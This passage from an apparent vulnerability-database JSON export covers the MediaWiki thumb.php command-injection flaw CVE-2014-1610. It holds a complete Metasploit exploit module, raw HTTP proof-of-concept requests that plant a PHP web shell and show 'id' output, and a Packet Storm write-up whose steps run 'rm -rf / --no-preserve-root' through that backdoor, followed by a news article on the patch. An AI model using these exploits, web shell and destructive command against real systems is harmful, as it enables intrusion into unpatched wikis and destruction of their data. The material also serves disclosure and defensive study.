'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error("File: #{file_name} does not exist.")\r\n elsif r\r\n print_error("Received response #{r.code}, exploit probably failed.")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name="#{name}".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n\n ", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85082"}, {"lastseen": "2017-11-19T17:34:30", 
"description": "CVE ID:CVE-2014-1610\r\n\r\nMediaWiki\u662f\u7f8e\u56fd\u7ef4\u57fa\u5a92\u4f53\uff08Wikimedia\uff09\u57fa\u91d1\u4f1a\u548cMediaWiki\u5fd7\u613f\u8005\u5171\u540c\u5f00\u53d1\u7ef4\u62a4\u7684\u4e00\u5957\u81ea\u7531\u514d\u8d39\u7684\u57fa\u4e8e\u7f51\u7edc\u7684Wiki\u5f15\u64ce\uff0c\u5b83\u53ef\u7528\u4e8e\u90e8\u7f72\u5185\u90e8\u7684\u77e5\u8bc6\u7ba1\u7406\u548c\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002 \r\n\r\nMediaWiki\u4e2d\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8ethumb.php\u811a\u672c\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u2018page\u2019\u53c2\u6570\u3002\u5f53\u542f\u7528\u652f\u6301\u4e0a\u4f20DjVu\u6216PDF\u6587\u4ef6\u65f6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u7279\u5236\u7684shell\u5143\u5b57\u7b26\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u4ee5\u4e0b\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aMediaWiki 1.22.2\u4e4b\u524d\u76841.22.x\u7248\u672c\uff0c1.21.5\u4e4b\u524d\u76841.21.x\u7248\u672c\uff0c1.19.11\u4e4b\u524d\u76841.19.x\u7248\u672c\u3002\n0\nMediaWiki <= 1.22.1\r\nMediaWiki <= 1.21.4\r\nMediaWiki <= 1.19.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMediaWiki\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a \r\n\r\nhttp://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "MediaWiki\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61437", "id": "SSV:61437", "sourceData": "\n GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: 
keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61437", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:12", "description": "", "published": "2014-02-19T00:00:00", "type": "packetstorm", "title": "MediaWiki Thumb.php Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "PACKETSTORM:125287", "href": "https://packetstormsecurity.com/files/125287/MediaWiki-Thumb.php-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: 
https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MediaWiki Thumb.php Remote Command Execution', \n'Description' => %q{ \nMediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, \nwhen DjVu or PDF file upload support is enabled, allows remote unauthenticated \nusers to execute arbitrary commands via shell metacharacters. If no target file \nis specified this module will attempt to log in with the provided credentials to \nupload a file (.DjVu) to use for exploitation. \n}, \n'Author' => \n[ \n'Netanel Rubin', # from Check Point - Discovery \n'Brandon Perry', # Metasploit Module \n'Ben Harris', # Metasploit Module \n'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-1610' ], \n[ 'OSVDB', '102630'], \n[ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], \n[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] \n], \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Automatic PHP-CLI', \n{ \n'Payload' => \n{ \n'BadChars' => \"\\r\\n\", \n'PrependEncoder' => \"php -r \\\"\", \n'AppendEncoder' => \"\\\"\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP \n} \n], \n[ 'Linux CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl python php', \n} \n}, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD \n} \n], \n[ 'Windows CMD', \n{ \n'Payload' => \n{ \n'BadChars' => \"\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl', \n} \n}, \n'Platform' => ['win'], \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2014')) \n \nregister_options( \n[ 
\nOptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]), \nOptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]), \nOptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ]) \n], self.class) \nend \n \ndef get_version(body) \nmeta_generator = get_html_value(body, 'meta', 'generator', 'content') \n \nunless meta_generator \nvprint_status(\"No META Generator tag on #{full_uri}.\") \nreturn nil, nil, nil \nend \n \nif meta_generator && meta_generator =~ /mediawiki/i \nvprint_status(\"#{meta_generator} detected.\") \nmeta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/ \nmajor = $1.to_i \nminor = $2.to_i \npatch = $3.to_i \nvprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\") \n \nreturn major, minor, patch \nend \n \nreturn nil, nil, nil \nend \n \ndef check \nuri = target_uri.path \n \nopts = { 'uri' => normalize_uri(uri, 'index.php') } \n \nresponse = send_request_cgi!(opts) \n \nif opts['redirect_uri'] \nvprint_status(\"Redirected to #{opts['redirect_uri']}.\") \nend \n \nunless response \nvprint_status(\"No response from #{full_uri}.\") \nreturn CheckCode::Unknown \nend \n \n# Mediawiki will give a 404 for unknown pages but still have a body \nif response.code == 200 || response.code == 404 \nvprint_status(\"#{response.code} response received...\") \n \nmajor, minor, patch = get_version(response.body) \n \nunless major \nreturn CheckCode::Unknown \nend \n \nif major == 1 && (minor < 8 || minor > 22) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 22 && patch > 1) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 21 && patch > 4) \nreturn CheckCode::Safe \nelsif major == 1 && (minor == 19 && patch > 10) \nreturn CheckCode::Safe \nelsif major == 1 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nvprint_status(\"Received response code #{response.code} from 
#{full_uri}\") \nCheckCode::Unknown \nend \n \ndef exploit \nuri = target_uri.path \n \nprint_status(\"Grabbing version and login CSRF token...\") \nresponse = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'title' => 'Special:UserLogin' } \n}) \n \nunless response \nfail_with(Failure::NotFound, \"Failed to retrieve webpage.\") \nend \n \nserver = response['Server'] \nif server && target.name =~ /automatic/i && server =~ /win32/i \nvprint_status(\"Windows platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Windows \nelsif server && target.name =~ /automatic/i \nvprint_status(\"Nix platform detected: #{server}.\") \nmy_platform = Msf::Module::Platform::Unix \nelse \nmy_platform = target.platform.platforms.first \nend \n \n# If we have already identified a DjVu/PDF file on the server trigger \n# the exploit \nunless datastore['FILENAME'].blank? \npayload_request(uri, datastore['FILENAME'], my_platform) \nreturn \nend \n \nusername = datastore['USERNAME'] \npassword = datastore['PASSWORD'] \n \nmajor, minor, patch = get_version(response.body) \n \n# Upload CSRF added in v1.18.2 \n# http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 \nif ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) \nupload_csrf = false \nelsif ((major == 1) && (minor < 18)) \nupload_csrf = false \nelse \nupload_csrf = true \nend \n \nsession_cookie = response.get_cookies \n \nwp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') \n \nif wp_login_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find login token. 
Is URI set correctly?\") \nelse \nprint_good(\"Retrieved login CSRF token.\") \nend \n \nprint_status(\"Attempting to login...\") \nlogin = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'method' => 'POST', \n'vars_get' => { \n'title' => 'Special:UserLogin', \n'action' => 'submitlogin', \n'type' => 'login' \n}, \n'cookie' => session_cookie, \n'vars_post' => { \n'wpName' => username, \n'wpPassword' => password, \n'wpLoginAttempt' => 'Log in', \n'wpLoginToken' => wp_login_token \n} \n}) \n \nif login and login.code == 302 \nprint_good(\"Log in successful.\") \nelse \nfail_with(Failure::NoAccess, \"Failed to log in.\") \nend \n \nauth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') \n \n# Testing v1.15.1 it looks like it has session fixation \n# vulnerability so we dont get a new session cookie after \n# authenticating. Therefore we need to include our old cookie. \nunless auth_cookie.include? 'session=' \nauth_cookie << session_cookie \nend \n \nprint_status(\"Getting upload CSRF token...\") if upload_csrf \nupload_file = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'cookie' => auth_cookie \n}) \n \nunless upload_file and upload_file.code == 200 \nfail_with(Failure::NotFound, \"Failed to access file upload page.\") \nend \n \nwp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf \nwp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') \ntitle = get_html_value(upload_file.body, 'input', 'title', 'value') \n \nif upload_csrf && wp_edit_token.blank? \nfail_with(Failure::UnexpectedReply, \"Couldn't find upload token. 
Is URI set correctly?\") \nelsif upload_csrf \nprint_good(\"Retrieved upload CSRF token.\") \nend \n \nupload_mime = Rex::MIME::Message.new \n \ndjvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\")) \nfile_name = \"#{rand_text_alpha(4)}.djvu\" \n \nupload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\") \nupload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\") \nupload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\") \nupload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\") \nupload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\") \nupload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf \nupload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\") \nupload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\") \nupload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\") \npost_data = upload_mime.to_s \n \nprint_status(\"Uploading DjVu file #{file_name}...\") \n \nupload = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), \n'data' => post_data, \n'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\", \n'cookie' => auth_cookie \n}) \n \nif upload and upload.code == 302 and upload.headers['Location'] \nlocation = upload.headers['Location'] \nprint_good(\"File uploaded to #{location}\") \nelse \nif upload.body.include? 
'not a permitted file type' \nfail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\") \nelse \nfail_with(Failure::UnexpectedReply, \"Failed to upload file.\") \nend \nend \n \npayload_request(uri, file_name, my_platform) \nend \n \ndef payload_request(uri, file_name, my_platform) \nif my_platform == Msf::Module::Platform::Windows \ntrigger = \"1)&(#{payload.encoded})&\" \nelse \ntrigger = \"1;#{payload.encoded};\" \nend \n \nvars_get = { 'f' => file_name } \nif file_name.include? '.pdf' \nvars_get['width'] = trigger \nelsif file_name.include? '.djvu' \nvars_get['width'] = 1 \nvars_get['p'] = trigger \nelse \nfail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\") \nend \n \nprint_status(\"Sending payload request...\") \nr = send_request_cgi({ \n'uri' => normalize_uri(uri, 'thumb.php'), \n'vars_get' => vars_get \n}, 1) \n \nif r && r.code == 404 && r.body =~ /not exist/ \nprint_error(\"File: #{file_name} does not exist.\") \nelsif r \nprint_error(\"Received response #{r.code}, exploit probably failed.\") \nend \nend \n \n# The order of name, value keeps shifting so regex is painful. 
\n# Cant use nokogiri due to security issues \n# Cant use REXML directly as its not strict XHTML \n# So we do a filthy mixture of regex and REXML \ndef get_html_value(html, type, name, value) \nreturn nil unless html \nreturn nil unless type \nreturn nil unless name \nreturn nil unless value \n \nfound = nil \nhtml.each_line do |line| \nif line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i \nfound = $& \nbreak \nend \nend \n \nif found \ndoc = REXML::Document.new found \nreturn doc.root.attributes[value] \nend \n \n'' \nend \nend \n \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125287/mediawiki_thumb.rb.txt"}, {"lastseen": "2016-12-05T22:15:32", "description": "", "published": "2014-02-03T00:00:00", "type": "packetstorm", "title": "MediaWiki 1.22.1 PdfHandler Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-03T00:00:00", "id": "PACKETSTORM:125040", "href": "https://packetstormsecurity.com/files/125040/MediaWiki-1.22.1-PdfHandler-Remote-Code-Execution.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n#################################################################### \n# \n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit \n(CVE-2014-1610) \n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group \n(Jan 19, 2014) \n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) \n# Affected website : Wikipedia.org and more ! \n# \n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto) \n# Release dates : Feb 1, 2014 \n# Special Thanks to 2600 Thailand ! \n# \n#################################################################### \n \n# Exploit: \n#################################################################### \n1. 
upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) \nhttp://vulnerable-site/index.php/Special:Upload \n2. inject os cmd to upload a php-backdoor \nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 \n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php` \n3. access to php-backdoor! \nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root \n4. happy pwning!! \n \n \n# Related files: \n#################################################################### \nthumb.php <-- extract all _GET array to params \n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width \noptions \n/includes/media/ImageHandler.php \n/includes/GlobalFunctions.php \n/includes/filerepo/file/File.php \n \n# Vulnerability Analysis: \n#################################################################### \n1. thumb.php \nThis script used to resize images if it is configured to be done \nwhen the web browser requests the image \n<? ... \n1.1 Called directly, use $_GET params \nwfThumbHandleRequest(); \n1.2 Handle a thumbnail request via query parameters \nfunction wfThumbHandleRequest() { \n$params = get_magic_quotes_gpc() \n? array_map( 'stripslashes', $_GET ) \n: $_GET; << WTF \n \nwfStreamThumb( $params ); // stream the thumbnail \n} \n1.3 Stream a thumbnail specified by parameters \nfunction wfStreamThumb( array $params ) { \n... \n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts \nuploaded.pdf file here \n... \n// Backwards compatibility parameters \nif ( isset( $params['w'] ) ) { \n$params['width'] = $params['w']; // << Inject os cmd here! \nunset( $params['w'] ); \n} \n... \n$img = wfLocalFile( $fileName ); \n... \n// Thumbnail isn't already there, so create the new thumbnail... \n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image \nby width/height \n... \n// Stream the file if there were no errors \n$thumb->streamFile( $headers ); \n... \n?> \n2. /includes/filerepo/file/File.php \n<? ... 
\nfunction transform( $params, $flags = 0 ) { ... \n$handler = $this->getHandler(); // << PDF Handler \n... \n$normalisedParams = $params; \n$handler->normaliseParams( $this, $normalisedParams ); \n... \n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); \n.. \n?> \n3. /extensions/PdfHandler/PdfHandler_body.php \n<? ... \nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { \n... \n$width = $params['width']; \n... \n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & \nparameters \n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} \n-dLastPage={$page}\"; \n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg( \n$srcPath ); \n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor ); \n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell \nargument \n$cmd .= wfEscapeShellArg( $dstPath ) . \")\"; \n$cmd .= \" 2>&1\"; \n... \n$err = wfShellExec( $cmd, $retval ); \n... \n?> \n4. /includes/GlobalFunctions.php \nExecute a shell command, with time and memory limits \n<? ... \nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = \narray() ) { \n... \npassthru( $cmd, $retval ); // << Execute here!! 
\n \n# Proof-Of-Concept \n#################################################################### \nGET \n/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php` \nHTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiUserID=2; my_wikiUserName=Longcat; \nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02 \n \n<html><head><title>Error generating thumbnail</title></head> \n<body> \n<h1>Error generating thumbnail</h1> \n<p> \n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br /> \nconvert: option requires an argument `-resize' @ \nerror/convert.c/ConvertImageCommand/2380.<br /> \nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> \n \n</p> \n \n</body> \n</html> \n \n \nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 \nHost: 127.0.0.1 \nConnection: keep-alive \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8 \nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; \nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 \n \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \n \n \n# Back-end $cmd \n#################################################################### \nGlobalFunctions.php : wfShellExec() \ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 \n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | \n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php \nsystem(\\\\$_GET[1]);\">images/longcat.php` - \n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1 \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.14 
(GNU/Linux) \n \niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU \nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf \nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 \nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 \nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb \nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv \nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh \nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt \nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ \nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan \nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR \n2LmeyQR2rzjBB7Sovvcn \n=ooEs \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125040/mediawiki1221-exec.txt"}], "thn": [{"lastseen": "2018-01-27T09:17:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-1610"], "description": "[](<https://4.bp.blogspot.com/-K0XlEYvexd8/UuolXbDRtQI/AAAAAAAAAS0/NGDSXCuuLJY/s1600/MediaWiki.jpg>)\n\nThe Encyclopedia giant **WIKIPEDIA** has been found vulnerable to [remote code execution](<https://thehackernews.com/search/label/remote%20code%20execution>) because of a critical flaw in _the MediaWiki software_.\n\n \n\n\nWikipedia is a name which has become a major source of information for all of us. It has webpages on almost every topic you need to search.\n\n \n\n\nThis giant is powered by an open source wiki software called MediaWiki. MediaWiki not only empowers Wikipedia, but also a number of other wiki websites. 
This software is a product of the Wikimedia Foundation and is coded in PHP with a database as backend.\n\n \n\n\n_Check Point Software Technologies_ [found](<http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html>) a remote code execution vulnerability in MediaWiki: \"_This vulnerability affects all versions of MediaWiki from 1.8 onwards._\" \n \nThe vulnerability, assigned the ID [_CVE-2014-1610_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610>), allows an attacker to execute shell code remotely via an incorrectly sanitized parameter on the MediaWiki application server. \n\n> _\u201cShell meta characters can be passed in the page parameter to the thumb.php.\u201d [Bug 60339](<https://bugzilla.wikimedia.org/show_bug.cgi?id=60339>)._\n\nMediaWiki announced [Security Releases](<https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html>) **1.22.2, 1.21.5 and 1.19.11**: \"_Your MediaWiki installation is affected by a remote code execution vulnerability if you have enabled file upload support for DjVu (natively supported by MediaWiki) or PDF files (in combination with the PdfHandler extension). Neither file type is enabled by default in MediaWiki installations. If you are affected, we strongly urge you to update immediately._\" \n \n**Key Findings:** The vulnerability could have turned Wikipedia\u2019s web servers into a malicious content distributor had it gone undiscovered. \n \n\"_Check Point promptly alerted the WikiMedia Foundation to the presence of this vulnerability, and after verifying it the Foundation released a software update to correct the issue._\"\n\n \n\n\nThe _Wikimedia Foundation_ released an update after learning of the vulnerability from Check Point. 
This is the 3rd 'remote code execution' [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) reported in MediaWiki Platform, since 2006.\n\n \n\n\n\u201c_It only takes a single vulnerability on a widely adopted platform for a hacker to infiltrate and wreak widespread damage_,\u201d says Dorit Dor, vice president of products, Check Point Software Technologies. Check Point's Vulnerability Research Group assesses common software to ensure the security of Internet users. \n \nMediaWiki 's latest version_ 1.22.2 Stable_ is fully patched to defend against this flaw, and Wikipedia is now also upgraded to it.\n\n \n\n\nSince almost all cyber security enthusiasts are putting efforts in finding security loopholes in the products available on the Internet, that has put Open source technology to the highest priority in terms of security testing.\n", "modified": "2014-01-30T10:50:25", "published": "2014-01-29T23:20:00", "id": "THN:14D220C3673BA5820F7A055DC2CB7A3A", "href": "https://thehackernews.com/2014/01/mediawiki-remote-code-execution.html", "type": "thn", "title": "MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMediaWiki 1.22.1 PdfHandler - Remote Code Execution", "edition": 1, "published": "2014-02-01T00:00:00", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EXPLOITPACK:740983D0417678074247C5AE47DBBED6", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n####################################################################\n#\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability 
